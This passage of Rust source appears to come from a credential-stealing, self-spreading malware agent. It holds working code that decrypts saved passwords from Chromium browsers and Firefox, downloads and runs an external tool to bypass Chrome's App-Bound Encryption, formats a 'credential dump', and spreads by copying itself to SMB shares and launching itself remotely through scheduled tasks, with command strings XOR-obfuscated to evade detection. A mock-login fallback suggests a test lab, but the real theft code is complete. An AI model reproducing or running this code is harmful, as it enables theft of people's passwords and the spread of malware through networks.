    let opera_path = format!("{appdata}\\Opera Software\\Opera Stable");

    let browser_bases: Vec<(&str, &str)> = vec![
        ("Chrome",  &chrome_path),
        ("Edge",    &edge_path),
        ("Brave",   &brave_path),
        ("Vivaldi", &vivaldi_path),
        ("Opera",   &opera_path),
    ];

    for (browser_name, user_data_dir) in &browser_bases {
        let user_data = Path::new(user_data_dir);
        if !user_data.exists() {
            println!("[-] {} not found, skipping", browser_name);
            continue;
        }

        // ---- 1. Derive AES master key from Local State ----
        // Try both 'encrypted_key' (v10 blobs) and 'app_bound_encrypted_key' (v20 blobs, Edge/Chrome 127+).
        let local_state_path = user_data.join("Local State");
        let ls_json_opt: Option<serde_json::Value> = fs::read_to_string(&local_state_path)
            .ok()
            .and_then(|s| serde_json::from_str(&s).ok());

        // Standard DPAPI key (v10) — 'DPAPI' prefix (5 bytes) + DPAPI blob
        let master_key_v10: Option<Vec<u8>> = (|| -> Option<Vec<u8>> {
            let ls_json = ls_json_opt.as_ref()?;
            let enc_key_b64 = ls_json.get("os_crypt")?.get("encrypted_key")?.as_str()?;
            let enc_key_bytes = decode(enc_key_b64).ok()?;
            if enc_key_bytes.len() <= 5 { return None; }
            let dpapi_blob = &enc_key_bytes[5..]; // skip 'DPAPI' prefix
            dpapi_decrypt_bytes(dpapi_blob)
        })();

        if master_key_v10.is_some() {
            println!("[+] {} - v10 master key derived ({} bytes)", browser_name,
                master_key_v10.as_ref().unwrap().len());
        } else {
            println!("[-] {} - could not derive v10 master key from Local State", browser_name);
        }

        // ---- 2. Find all profiles (Default + Profile N) ----
        let profile_dirs: Vec<std::path::PathBuf> = if *browser_name == "Opera" {
            // Opera stores Login Data directly in the user_data_dir
            vec![user_data.to_path_buf()]
        } else {
            let mut dirs = vec![user_data.join("Default")];
            for i in 1..=10 {
                let p = user_data.join(format!("Profile {}", i));
                if p.exists() {
                    dirs.push(p);
                }
            }
            dirs
        };

        for profile_dir in &profile_dirs {
            let login_db = profile_dir.join("Login Data");
            if !login_db.exists() {
                continue;
            }

            // ---- 3. Copy Login Data + WAL files to temp (browser locks the original) ----
            let millis = std::time::SystemTime::now()
                .duration_since(std::time::UNIX_EPOCH)
                .unwrap_or_default()
                .as_millis();
            let tmp_path = std::env::temp_dir()
                .join(format!("ldb_{}_{}.tmp", browser_name, millis));
            if let Err(e) = fs::copy(&login_db, &tmp_path) {
                println!("[-] {} - could not copy Login Data: {}", browser_name, e);
                continue;
            }
            // Copy WAL and SHM — must be named exactly <tmp_path>-wal / <tmp_path>-shm
            let wal_src = login_db.parent()
                .unwrap_or_else(|| std::path::Path::new("."))
                .join("Login Data-wal");
            let shm_src = login_db.parent()
                .unwrap_or_else(|| std::path::Path::new("."))
                .join("Login Data-shm");
            if wal_src.exists() {
                let mut wal_dst_os = tmp_path.clone().into_os_string();
                wal_dst_os.push("-wal");
                let copied = fs::copy(&wal_src, std::path::Path::new(&wal_dst_os)).is_ok();
                println!("[+] {} - WAL copy: {}", browser_name, if copied { "ok" } else { "failed" });
            } else {
                println!("[~] {} - no WAL file (DB fully checkpointed)", browser_name);
            }
            if shm_src.exists() {
                let mut shm_dst_os = tmp_path.clone().into_os_string();
                shm_dst_os.push("-shm");
                let _ = fs::copy(&shm_src, std::path::Path::new(&shm_dst_os));
            }

            // ---- 4. Open SQLite (journal_mode=OFF on copy to avoid WAL issues) ----
            let conn = match Connection::open_with_flags(
                &tmp_path,
                OpenFlags::SQLITE_OPEN_READ_ONLY,
            ) {
                Ok(c) => c,
                Err(e) => {
                    println!("[-] {} - SQLite open failed: {}", browser_name, e);
                    let _ = fs::remove_file(&tmp_path);
                    continue;
                }
            };
            // Disable WAL on the copy so SQLite reads pages directly
            let _ = conn.execute_batch("PRAGMA journal_mode=DELETE;");

            let mut stmt = match conn.prepare(
                "SELECT origin_url, username_value, password_value FROM logins",
            ) {
                Ok(s) => s,
                Err(e) => {
                    println!("[-] {} - SQL prepare failed: {}", browser_name, e);
                    let _ = fs::remove_file(&tmp_path);
                    continue;
                }
            };

            let rows_iter = stmt.query_map([], |row| {
                Ok((
                    row.get::<_, String>(0).unwrap_or_default(),
                    row.get::<_, String>(1).unwrap_or_default(),
                    row.get::<_, Vec<u8>>(2).unwrap_or_default(),
                ))
            });

            match rows_iter {
                Ok(rows) => {
                    for row_result in rows {
                        match row_result {
                            Ok((url, username, blob)) => {
                                // ---- 5. Decrypt password ----
                                // v20 blobs are handled by chromelevator; skip them here
                                if blob.starts_with(b"v20") { continue; }
                                let password = if blob.starts_with(b"v10") {
                                    // AES-GCM with user-DPAPI master key
                                    if let Some(key_bytes) = &master_key_v10 {
                                        if blob.len() >= 15 {
                                            let nonce_bytes = &blob[3..15];
                                            let ciphertext = &blob[15..];
                                            let key = Key::<Aes256Gcm>::from_slice(key_bytes);
                                            let cipher = Aes256Gcm::new(key);
                                            let nonce = Nonce::from_slice(nonce_bytes);
                                            match cipher.decrypt(nonce, ciphertext) {
                                                Ok(pt) => String::from_utf8_lossy(&pt).to_string(),
                                                Err(_) => "[AES-GCM decrypt failed]".to_string(),
                                            }
                                        } else {
                                            "[blob too short]".to_string()
                                        }
                                    } else {
                                        "[no master key]".to_string()
                                    }
                                } else if !blob.is_empty() {
                                    // Legacy: raw DPAPI blob
                                    match dpapi_decrypt_bytes(&blob) {
                                        Some(pt) => String::from_utf8_lossy(&pt).to_string(),
                                        None => "[DPAPI decrypt failed]".to_string(),
                                    }
                                } else {
                                    String::new()
                                };
                                results.push(DecryptedCredential {
                                    url,
                                    username,
                                    password,
                                    captured_at: Utc::now().to_rfc3339(),
                                });
                            }
                            Err(e) => println!("[-] Row error: {}", e),
                        }
                    }
                }
                Err(e) => println!("[-] {} - query_map failed: {}", browser_name, e),
            }

            let _ = fs::remove_file(&tmp_path);
        }
    }

    results
}

// ---------------------------------------------------------------------------
// Firefox credential stealer (Windows only, no elevated permissions needed)
// Uses pure Rust crypto: SHA1 + HMAC-SHA1 + 3DES-CBC, no NSS required
// ---------------------------------------------------------------------------

#[cfg(windows)]
fn steal_firefox_creds_windows() -> Vec<DecryptedCredential> {
    use cipher::{BlockDecryptMut, KeyIvInit, block_padding::NoPadding};
    use des::TdesEde3;
    use aes::Aes256;
    use rusqlite::{Connection, OpenFlags};
    use sha2::Sha256;
    use hmac::{Hmac, Mac};
    type HmacSha256     = Hmac<Sha256>;
    type TdesEde3CbcDec = cbc::Decryptor<TdesEde3>;
    type Aes256CbcDec   = cbc::Decryptor<Aes256>;

    /// Minimal ASN.1 DER: returns (tag, content, rest)
    fn der_next(data: &[u8]) -> Option<(u8, &[u8], &[u8])> {
        if data.len() < 2 { return None; }
        let tag = data[0];
        let (len, hdr) = if data[1] & 0x80 == 0 {
            (data[1] as usize, 2usize)
        } else {
            let nb = (data[1] & 0x7f) as usize;
            if data.len() < 2 + nb { return None; }
            let mut l = 0usize;
            for i in 0..nb { l = (l << 8) | data[2 + i] as usize; }
            (l, 2 + nb)
        };
        if data.len() < hdr + len { return None; }
        Some((tag, &data[hdr..hdr + len], &data[hdr + len..]))
    }

    /// Parse the a11 blob which uses PBES2 (PBKDF2-HMAC-SHA256 + AES-256-CBC).
    /// Real structure confirmed from key4.db dump:
    ///   SEQUENCE {
    ///     SEQUENCE {            <- PBES2 alg
    ///       OID id-PBES2
    ///       SEQUENCE {          <- PBES2 params
    ///         SEQUENCE {        <- PBKDF2 SEQUENCE
    ///           OID id-PBKDF2
    ///           SEQUENCE {      <- PBKDF2 params
    ///             OCTET STRING  <- salt (32 bytes)
    ///             INTEGER       <- iterations
    ///             INTEGER       <- keylen
    ///             SEQUENCE { OID hmacWithSHA256 }
    ///           }
    ///         }
    ///         SEQUENCE {        <- AES-256-CBC params
    ///           OID aes-256-CBC
    ///           OCTET STRING    <- IV (14 bytes stored; zero-padded to 16)
    ///         }
    ///       }
    ///     }
    ///     OCTET STRING          <- ciphertext
    ///   }
    /// Returns (pbkdf2_salt, iterations, keylen, iv_padded_16, ciphertext)
    fn parse_pbes2_a11(data: &[u8]) -> Option<(Vec<u8>, u32, u32, [u8; 16], Vec<u8>)> {
        // outer SEQUENCE
        let (t, outer, _) = der_next(data)?;
        if t != 0x30 { return None; }
        // outer[0]: PBES2 alg SEQUENCE
        let (t, pbes2_alg, rest_outer) = der_next(outer)?;
        if t != 0x30 { return None; }
        // outer[1]: ciphertext OCTET STRING
        let (t, ciphertext, _) = der_next(rest_outer)?;
        if t != 0x04 { return None; }
        // pbes2_alg[0]: OID id-PBES2 (skip)
        let (t, _oid_pbes2, rest_pbes2) = der_next(pbes2_alg)?;
        if t != 0x06 { return None; }
        // pbes2_alg[1]: PBES2 params SEQUENCE
        let (t, pbes2_params, _) = der_next(rest_pbes2)?;
        if t != 0x30 { return None; }
        // pbes2_params[0]: PBKDF2 SEQUENCE
        let (t, pbkdf2_seq, rest_params) = der_next(pbes2_params)?;
        if t != 0x30 { return None; }
        // pbes2_params[1]: AES-256-CBC params SEQUENCE
        let (t, aes_seq, _) = der_next(rest_params)?;
        if t != 0x30 { return None; }
        // pbkdf2_seq[0]: OID id-PBKDF2 (skip)
        let (t, _oid_pbkdf2, rest_pbkdf2) = der_next(pbkdf2_seq)?;
        if t != 0x06 { return None; }
        // pbkdf2_seq[1]: PBKDF2 params SEQUENCE
        let (t, pbkdf2_params, _) = der_next(rest_pbkdf2)?;
        if t != 0x30 { return None; }
        // pbkdf2_params[0]: salt OCTET STRING
        let (t, salt, rest_pbkdf2p) = der_next(pbkdf2_params)?;
        if t != 0x04 { return None; }
        // pbkdf2_params[1]: iterations INTEGER
        let (t, iter_bytes, rest_pbkdf2p2) = der_next(rest_pbkdf2p)?;
        if t != 0x02 { return None; }
        let iterations = iter_bytes.iter().fold(0u32, |acc, &b| (acc << 8) | b as u32);
        // pbkdf2_params[2]: keylen INTEGER
        let (t, klen_bytes, _) = der_next(rest_pbkdf2p2)?;
        if t != 0x02 { return None; }
        let keylen = klen_bytes.iter().fold(0u32, |acc, &b| (acc << 8) | b as u32);
        // aes_seq[0]: OID aes-256-CBC (skip)
        let (t, _oid_aes, rest_aes) = der_next(aes_seq)?;
        if t != 0x06 { return None; }
        // aes_seq[1]: IV OCTET STRING (may be < 16 bytes; zero-pad to 16)
        let (t, iv_raw, _) = der_next(rest_aes)?;
        if t != 0x04 { return None; }
        let mut iv = [0u8; 16];
        let copy_len = iv_raw.len().min(16);
        iv[..copy_len].copy_from_slice(&iv_raw[..copy_len]);
        Some((salt.to_vec(), iterations, keylen, iv, ciphertext.to_vec()))
    }

    /// Navigate old-format PBE ASN.1 blob (pbeWithSha1And3DES) used by logins.json fields.
    /// Structure:
    ///   SEQUENCE {
    ///     SEQUENCE {          <- alg params
    ///       OID ...
    ///       SEQUENCE {
    ///         OCTET STRING    <- entry_salt (= 3DES IV)
    ///         INTEGER
    ///       }
    ///     }
    ///     OCTET STRING        <- ciphertext
    ///   }
    fn parse_pbe_blob(data: &[u8]) -> Option<(Vec<u8>, Vec<u8>)> {
        // outer SEQUENCE
        let (t, outer, _) = der_next(data)?;
        if t != 0x30 { return None; }
        // outer[0]: alg SEQUENCE
        let (t, alg_seq, rest_after_alg) = der_next(outer)?;
        if t != 0x30 { return None; }
        // outer[1]: ciphertext OCTET STRING
        let (t, ciphertext, _) = der_next(rest_after_alg)?;
        if t != 0x04 { return None; }
        // alg_seq[0]: OID (skip)
        let (t, _oid, rest_in_alg) = der_next(alg_seq)?;
        if t != 0x06 { return None; }
        // alg_seq[1]: SEQUENCE containing salt
        let (t, salt_seq, _) = der_next(rest_in_alg)?;
        if t != 0x30 { return None; }
        // salt_seq[0]: entry_salt OCTET STRING
        let (t, entry_salt, _) = der_next(salt_seq)?;
        if t != 0x04 { return None; }
        Some((entry_salt.to_vec(), ciphertext.to_vec()))
    }

    /// Decrypt a logins.json field using the 24-byte global key (3DES-CBC).
    /// The encrypted blob is a PBE ASN.1 structure where the entry_salt IS the IV (8 bytes).
    fn decrypt_login_field(b64: &str, global_key: &[u8]) -> Option<String> {
        let raw = base64::decode(b64).ok()?;
        let (iv_bytes, ciphertext) = parse_pbe_blob(&raw)?;
        if global_key.len() < 24 || ciphertext.is_empty() { return None; }
        let key24: [u8; 24] = global_key[..24].try_into().ok()?;
        let iv8: [u8; 8] = iv_bytes.get(..8)?.try_into().ok()?;
        let mut buf = ciphertext.clone();
        while buf.len() % 8 != 0 { buf.push(0); }
        let dec = TdesEde3CbcDec::new(&key24.into(), &iv8.into());
        let pt = dec.decrypt_padded_mut::<NoPadding>(&mut buf).ok()?;
        // Strip PKCS7 padding manually
        let pt = if let Some(&pad) = pt.last() {
            let pad = pad as usize;
            if pad > 0 && pad <= 8 && pt.len() >= pad { &pt[..pt.len() - pad] } else { pt }
        } else { return None; };
        let trimmed = pt.iter().rposition(|&b| b != 0).map(|i| &pt[..=i]).unwrap_or(pt);
        String::from_utf8(trimmed.to_vec()).ok()
    }

    let mut results: Vec<DecryptedCredential> = Vec::new();

    let appdata = match std::env::var("APPDATA") {
        Ok(v) => v,
        Err(_) => return results,
    };

    let profiles_dir = std::path::Path::new(&appdata)
        .join("Mozilla").join("Firefox").join("Profiles");
    if !profiles_dir.exists() {
        println!("[-] Firefox profiles not found");
        return results;
    }

    let profile_dirs: Vec<std::path::PathBuf> = match fs::read_dir(&profiles_dir) {
        Ok(rd) => rd.filter_map(|e| e.ok()).map(|e| e.path())
            .filter(|p| p.is_dir()).collect(),
        Err(_) => return results,
    };

    for profile in &profile_dirs {
        let key4_path = profile.join("key4.db");
        let logins_path = profile.join("logins.json");
        if !key4_path.exists() || !logins_path.exists() { continue; }

        println!("[+] Firefox profile: {:?}", profile.file_name().unwrap_or_default());

        let conn = match Connection::open_with_flags(
            &key4_path, OpenFlags::SQLITE_OPEN_READ_ONLY | OpenFlags::SQLITE_OPEN_NO_MUTEX,
        ) {
            Ok(c) => c,
            Err(e) => { println!("[-] Firefox key4.db: {}", e); continue; }
        };

        // Read global_salt (item1) from the 'password' row in metadata
        let global_salt: Vec<u8> = match conn.query_row(
            "SELECT item1 FROM metadata WHERE id='password'", [],
            |row| row.get::<_, Vec<u8>>(0),
        ) {
            Ok(v) => v,
            Err(e) => { println!("[-] Firefox metadata: {}", e); continue; }
        };

        // Read a11 blob (wrapped master key) from nssPrivate
        let a11_blob: Vec<u8> = match conn.query_row(
            "SELECT a11 FROM nssPrivate LIMIT 1", [],
            |row| row.get::<_, Vec<u8>>(0),
        ) {
            Ok(v) => v,
            Err(e) => { println!("[-] Firefox nssPrivate: {}", e); continue; }
        };

        // Parse a11 blob: PBES2 with PBKDF2-HMAC-SHA256 + AES-256-CBC
        let (pbkdf2_salt, iterations, _keylen, aes_iv, a11_ct) =
            match parse_pbes2_a11(&a11_blob) {
                Some(v) => v,
                None => { println!("[-] Firefox a11 parse failed"); continue; }
            };

        // PBKDF2-HMAC-SHA256(password="", salt, iterations, 32 bytes) -> derived_key
        let mut derived_key = [0u8; 32];
        if pbkdf2::pbkdf2::<HmacSha256>(
            b"",
            &pbkdf2_salt,
            iterations,
            &mut derived_key,
        ).is_err() {
            println!("[-] Firefox PBKDF2 failed"); continue;
        }

        // AES-256-CBC decrypt the a11 ciphertext -> raw global key
        let mut a11_buf = a11_ct.clone();
        while a11_buf.len() % 16 != 0 { a11_buf.push(0); }
        let gk_raw = match Aes256CbcDec::new(&derived_key.into(), &aes_iv.into())
            .decrypt_padded_mut::<NoPadding>(&mut a11_buf) {
            Ok(pt) => pt.to_vec(),
            Err(e) => { println!("[-] Firefox a11 AES decrypt: {:?}", e); continue; }
        };
        // Strip PKCS7 padding
        let global_key: Vec<u8> = {
            let pad = gk_raw.last().copied().unwrap_or(0) as usize;
            if pad > 0 && pad <= 16 && gk_raw.len() >= pad {
                gk_raw[..gk_raw.len() - pad].to_vec()
            } else {
                gk_raw.clone()
            }
        };
        if global_key.len() < 24 {
            println!("[-] Firefox global key too short: {}", global_key.len()); continue;
        }
        println!("[+] Firefox - global key derived ({} bytes)", global_key.len());

        // Parse logins.json
        let logins_str = match fs::read_to_string(&logins_path) {
            Ok(s) => s,
            Err(e) => { println!("[-] Firefox logins.json: {}", e); continue; }
        };
        let logins_v: serde_json::Value = match serde_json::from_str(&logins_str) {
            Ok(v) => v,
            Err(e) => { println!("[-] Firefox logins.json parse: {}", e); continue; }
        };
        let entries = match logins_v.get("logins").and_then(|v| v.as_array()) {
            Some(a) => a.clone(),
            None => { println!("[-] Firefox: no logins array"); continue; }
        };

        for entry in &entries {
            let url = entry.get("hostname").or_else(|| entry.get("origin"))
                .and_then(|v| v.as_str()).unwrap_or("").to_string();
            let enc_user = entry.get("encryptedUsername").and_then(|v| v.as_str()).unwrap_or("");
            let enc_pass = entry.get("encryptedPassword").and_then(|v| v.as_str()).unwrap_or("");
            if enc_user.is_empty() && enc_pass.is_empty() { continue; }
            let username = decrypt_login_field(enc_user, &global_key)
                .unwrap_or_else(|| "[decrypt failed]".to_string());
            let password = decrypt_login_field(enc_pass, &global_key)
                .unwrap_or_else(|| "[decrypt failed]".to_string());
            println!("[+] Firefox cred: {} | {}", url, username);
            results.push(DecryptedCredential {
                url, username, password,
                captured_at: chrono::Utc::now().to_rfc3339(),
            });
        }
    }

    results
}

#[cfg(not(windows))]
fn steal_firefox_creds_windows() -> Vec<DecryptedCredential> {
    vec![]
}

#[cfg(not(windows))]
fn steal_real_browser_creds_windows() -> Vec<DecryptedCredential> {
    vec![]
}

// ---------------------------------------------------------------------------
// ABE bypass via chromelevator.exe subprocess
// ---------------------------------------------------------------------------

/// chromelevator passwords.json entry
#[derive(Deserialize)]
struct ChromelevatorPassword {
    url: Option<String>,
    user: Option<String>,
    pass: Option<String>,
}

/// Download chromelevator.exe from GitHub releases, run it, parse output.
/// Falls back silently on any error so the rest of the stealer still runs.
#[cfg(windows)]
fn steal_chromium_abe_subprocess_windows() -> Vec<DecryptedCredential> {
    use std::process::Command;

    let mut results: Vec<DecryptedCredential> = Vec::new();

    // --- paths ---
    let tmp = match std::env::var("TEMP").or_else(|_| std::env::var("TMP")) {
        Ok(t) => t,
        Err(_) => {
            println!("[-] ABE: no TEMP var, skipping");
            return results;
        }
    };
    let exe_path = format!("{}\\chromelevator.exe", tmp);
    let out_dir  = format!("{}\\clev_out", tmp);

    // --- download if not already present ---
    if !std::path::Path::new(&exe_path).exists() {
        println!("[+] ABE: downloading chromelevator zip...");
        let zip_url = "https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases/latest/download/chrome-injector-v0.20.0.zip";
        let client = reqwest::blocking::Client::builder()
            .timeout(Duration::from_secs(120))
            .user_agent("Mozilla/5.0")
            .build()
            .unwrap_or_default();
        let zip_bytes = match client.get(zip_url).send().and_then(|r| r.bytes()) {
            Ok(b) => b,
            Err(e) => {
                println!("[-] ABE: zip download failed: {}", e);
                return results;
            }
        };
        // Extract chromelevator_x64.exe from the in-memory zip
        use std::io::Cursor;
        let cursor = Cursor::new(&zip_bytes[..]);
        let mut archive = match zip::ZipArchive::new(cursor) {
            Ok(a) => a,
            Err(e) => {
                println!("[-] ABE: zip open failed: {}", e);
                return results;
            }
        };
        let exe_bytes = match archive.by_name("chromelevator_x64.exe") {
            Ok(mut entry) => {
                use std::io::Read;
                let mut buf = Vec::with_capacity(entry.size() as usize);
                if let Err(e) = entry.read_to_end(&mut buf) {
                    println!("[-] ABE: zip read entry failed: {}", e);
                    return results;
                }
                buf
            }
            Err(e) => {
                println!("[-] ABE: chromelevator_x64.exe not found in zip: {}", e);
                return results;
            }
        };
        if let Err(e) = fs::write(&exe_path, &exe_bytes) {
            println!("[-] ABE: write exe failed: {}", e);
            return results;
        }
        println!("[+] ABE: chromelevator.exe extracted and written ({} bytes)", exe_bytes.len());
    } else {
        println!("[+] ABE: chromelevator.exe already cached");
    }

    // --- create fresh output dir ---
    let _ = fs::remove_dir_all(&out_dir);
    if let Err(e) = fs::create_dir_all(&out_dir) {
        println!("[-] ABE: mkdir failed: {}", e);
        return results;
    }

    // --- run chromelevator ---
    println!("[+] ABE: running chromelevator...");
    match Command::new(&exe_path)
        .args(&["--output-path", &out_dir, "all"])
        .output()
    {
        Ok(out) => {
            println!(
                "[+] ABE: chromelevator exited (status: {})",
                out.status
            );
        }
        Err(e) => {
            println!("[-] ABE: exec failed: {}", e);
            let _ = fs::remove_file(&exe_path);
            return results;
        }
    }

    // --- walk output dir for passwords.json files ---
    // layout: <out_dir>/<BrowserName>/<ProfileName>/passwords.json
    let walker = match fs::read_dir(&out_dir) {
        Ok(w) => w,
        Err(e) => {
            println!("[-] ABE: read output dir failed: {}", e);
            let _ = fs::remove_dir_all(&out_dir);
            let _ = fs::remove_file(&exe_path);
            return results;
        }
    };

    for browser_entry in walker.flatten() {
        let browser_path = browser_entry.path();
        if !browser_path.is_dir() { continue; }
        let browser_name = browser_path
            .file_name()
            .unwrap_or_default()
            .to_string_lossy()
            .to_string();

        let profiles = match fs::read_dir(&browser_path) {
            Ok(p) => p,
            Err(_) => continue,
        };

        for profile_entry in profiles.flatten() {
            let profile_path = profile_entry.path();
            if !profile_path.is_dir() { continue; }

            let pw_file = profile_path.join("passwords.json");
            if !pw_file.exists() { continue; }

            let content = match fs::read_to_string(&pw_file) {
                Ok(c) => c,
                Err(e) => {
                    println!("[-] ABE: read {} failed: {}", pw_file.display(), e);
                    continue;
                }
            };

            let entries: Vec<ChromelevatorPassword> = match serde_json::from_str(&content) {
                Ok(v) => v,
                Err(e) => {
                    println!("[-] ABE: parse {} failed: {}", pw_file.display(), e);
                    continue;
                }
            };

            for entry in entries {
                let url      = entry.url.unwrap_or_default();
                let username = entry.user.unwrap_or_default();
                let password = entry.pass.unwrap_or_default();
                if url.is_empty() && username.is_empty() && password.is_empty() {
                    continue;
                }
                println!(
                    "[+] ABE {} cred: {} | {}",
                    browser_name, url, username
                );
                results.push(DecryptedCredential {
                    url,
                    username,
                    password,
                    captured_at: Utc::now().to_rfc3339(),
                });
            }
        }
    }

    // --- cleanup ---
    let _ = fs::remove_dir_all(&out_dir);
    // leave chromelevator.exe cached for next run (avoids re-downloading every loop)

    results
}

#[cfg(not(windows))]
fn steal_chromium_abe_subprocess_windows() -> Vec<DecryptedCredential> {
    vec![]
}

// Steal browser credentials: real browsers + mock fallback
fn steal_browser_credentials() -> String {
    println!("[+] Attempting to steal browser credentials...");

    // ---- Part 1: Real browsers (Windows only) ----
    let mut all_creds: Vec<DecryptedCredential> = steal_real_browser_creds_windows();
    let real_count = all_creds.len();
    println!("[+] Real browser creds found: {}", real_count);
    // ---- Part 1b: Firefox (Windows only) ----
    let firefox_creds = steal_firefox_creds_windows();
    let firefox_count = firefox_creds.len();
    println!("[+] Firefox creds found: {}", firefox_count);
    all_creds.extend(firefox_creds);
    // ---- Part 1c: ABE (v20) bypass via chromelevator subprocess (Windows only) ----
    let abe_creds = steal_chromium_abe_subprocess_windows();
    let abe_count = abe_creds.len();
    println!("[+] ABE (v20) creds found: {}", abe_count);
    all_creds.extend(abe_creds);

    // ---- Part 2: Mock logins from Desktop ----
    let desktop_path = if cfg!(windows) {
        match std::env::var("USERPROFILE") {
            Ok(profile) => format!("{}\\Desktop\\mock_logins.json", profile),
            Err(_) => String::new(),
        }
    } else {
        match std::env::var("HOME") {
            Ok(home) => format!("{}/Desktop/mock_logins.json", home),
            Err(_) => String::new(),
        }
    };

    let mock_count = if !desktop_path.is_empty() {
        println!("[*] Looking for mock logins at: {}", desktop_path);
        match fs::read_to_string(&desktop_path) {
            Ok(file_content) => {
                match serde_json::from_str::<Vec<MockLogin>>(&file_content) {
                    Ok(mock_logins) => {
                        println!("[+] Found {} mock credential entries", mock_logins.len());
                        let count = mock_logins.len();
                        for login in mock_logins {
                            let decrypted_password = mock_dpapi_decrypt(&login.password_value);
                            all_creds.push(DecryptedCredential {
                                url: login.origin_url,
                                username: login.username_value,
                                password: decrypted_password,
                                captured_at: Utc::now().to_rfc3339(),
                            });
                        }
                        count
                    }
                    Err(e) => {
                        println!("[-] Failed to parse mock_logins.json: {}", e);
                        0
                    }
                }
            }
            Err(e) => {
                println!("[-] mock_logins.json not found or unreadable: {}", e);
                0
            }
        }
    } else {
        0
    };

    println!(
        "[+] Total credentials collected: {} (real: {}, abe: {}, firefox: {}, mock: {})",
        all_creds.len(), real_count, abe_count, firefox_count, mock_count
    );
    // ---- Format output ----
    match serde_json::to_string_pretty(&all_creds) {
        Ok(json) => {
            let mut output = String::new();
            output.push_str("=== BROWSER CREDENTIAL DUMP ===\n");
            output.push_str(&format!("Total credentials found: {}\n", all_creds.len()));
            output.push_str(&format!("  Real browsers (Chromium v10/legacy): {}\n", real_count));
            output.push_str(&format!("  ABE bypass (Chromium v20/Edge): {}\n", abe_count));
            output.push_str(&format!("  Mock ({}): {}\n", desktop_path, mock_count));
            output.push_str(&format!("  Firefox: {}\n", firefox_count));
            output.push_str("\n--- Decrypted Credentials (JSON) ---\n");
            output.push_str(&json);
            output.push_str("\n=== END OF DUMP ===");
            output
        }
        Err(e) => format!("Error serializing credentials: {}", e),
    }
}

// Propagate agent binary to remote hosts via SMB share + schtasks remote exec
// Usage: propagate [\\host\share [user] [pass]]
// No-arg mode: auto-discovers mounted SMB shares via `net use`

fn discover_smb_shares() -> Vec<String> {
    use std::process::Command;
    let net_cmd  = String::from_utf8(xor_decrypt(secrets::ENC_NET_CMD)).unwrap_or_default();
    let net_arg  = String::from_utf8(xor_decrypt(secrets::ENC_NET_USE_ARG)).unwrap_or_default();
    let out = match Command::new(&net_cmd).arg(&net_arg).output() {
        Ok(o) => String::from_utf8_lossy(&o.stdout).to_string(),
        Err(_) => return vec![],
    };
    out.lines()
        .filter_map(|line| {
            line.split_whitespace().find(|tok| {
                let b = tok.as_bytes();
                b.len() >= 3 && b[0] == b'\\' && b[1] == b'\\'
            })
            .map(|s| s.to_string())
        })
        .collect()
}
fn propagate_to_target(target: &str, user: &str, pass: &str) -> String {
    use std::process::Command;
    let exe = match std::env::current_exe() {
        Ok(p) => p,
        Err(e) => return format!("[-] Cannot locate self: {}", e),
    };
    let exe_name  = String::from_utf8(xor_decrypt(secrets::ENC_EXE_NAME)).unwrap_or_default();
    let task_name = String::from_utf8(xor_decrypt(secrets::ENC_TASK_NAME)).unwrap_or_default();
    let sc_cmd    = String::from_utf8(xor_decrypt(secrets::ENC_SCHTASKS_CMD)).unwrap_or_default();
    let sc_create = String::from_utf8(xor_decrypt(secrets::ENC_SC_CREATE)).unwrap_or_default();
    let sc_run    = String::from_utf8(xor_decrypt(secrets::ENC_SC_RUN)).unwrap_or_default();
    let sc_delete = String::from_utf8(xor_decrypt(secrets::ENC_SC_DELETE)).unwrap_or_default();
    let sc_s      = String::from_utf8(xor_decrypt(secrets::ENC_SC_S)).unwrap_or_default();
    let sc_tn     = String::from_utf8(xor_decrypt(secrets::ENC_SC_TN)).unwrap_or_default();
    let sc_tr     = String::from_utf8(xor_decrypt(secrets::ENC_SC_TR)).unwrap_or_default();
    let sc_sc     = String::from_utf8(xor_decrypt(secrets::ENC_SC_SC)).unwrap_or_default();
    let sc_st     = String::from_utf8(xor_decrypt(secrets::ENC_SC_ST)).unwrap_or_default();
    let sc_f      = String::from_utf8(xor_decrypt(secrets::ENC_SC_F)).unwrap_or_default();
    let sc_u      = String::from_utf8(xor_decrypt(secrets::ENC_SC_U)).unwrap_or_default();
    let sc_p      = String::from_utf8(xor_decrypt(secrets::ENC_SC_P)).unwrap_or_default();
    let sc_once   = String::from_utf8(xor_decrypt(secrets::ENC_SC_ONCE)).unwrap_or_default();
    let sc_time   = String::from_utf8(xor_decrypt(secrets::ENC_SC_TIME)).unwrap_or_default();
    let dest = format!("{}\\{}", target, exe_name);
    let mut output = String::new();
    output.push_str(&format!("[*] Propagating to {}...\n", target));
    // Step 1: Copy binary to SMB share
    match std::fs::copy(&exe, &dest) {
        Ok(_) => output.push_str(&format!("[+] Copied to {}\n", dest)),
        Err(e) => {
            output.push_str(&format!("[-] Copy to {} failed: {}\n", dest, e));
            return output;
        }
    }
    // Step 2: Extract hostname from UNC path
    let host = target.trim_start_matches('\\').split('\\').next().unwrap_or("");
    if host.is_empty() {
        output.push_str("[-] Could not parse host from UNC path\n");
        return output;
    }
    // Step 3: Schedule task on remote host
    let mut create_args: Vec<String> = vec![
        sc_create.clone(),
        sc_s.clone(), host.to_string(),
        sc_tn.clone(), task_name.clone(),
        sc_tr.clone(), dest.clone(),
        sc_sc.clone(), sc_once.clone(),
        sc_st.clone(), sc_time.clone(),
        sc_f.clone(),
    ];
    if !user.is_empty() { create_args.extend([sc_u.clone(), user.to_string()]); }
    if !pass.is_empty() { create_args.extend([sc_p.clone(), pass.to_string()]); }
    match Command::new(&sc_cmd).args(&create_args).output() {
        Ok(o) => {
            let stdout = String::from_utf8_lossy(&o.stdout);
            let stderr = String::from_utf8_lossy(&o.stderr);
            if o.status.success() {
                output.push_str(&format!("[+] Task created: {}\n", stdout.trim()));
            } else {
                output.push_str(&format!("[-] Task create failed: {} {}\n", stdout.trim(), stderr.trim()));
                return output;
            }
        }
        Err(e) => {
            output.push_str(&format!("[-] Scheduler not available: {}\n", e));
            return output;
        }
    }
    // Step 4: Run the task immediately
    let mut run_args: Vec<String> = vec![
        sc_run.clone(), sc_s.clone(), host.to_string(),
        sc_tn.clone(), task_name.clone(),
    ];
    if !user.is_empty() { run_args.extend([sc_u.clone(), user.to_string()]); }
    if !pass.is_empty() { run_args.extend([sc_p.clone(), pass.to_string()]); }
    match Command::new(&sc_cmd).args(&run_args).output() {
        Ok(o) => {
            let stdout = String::from_utf8_lossy(&o.stdout);
            if o.status.success() {
                output.push_str(&format!("[+] Task triggered: {}\n", stdout.trim()));
            } else {
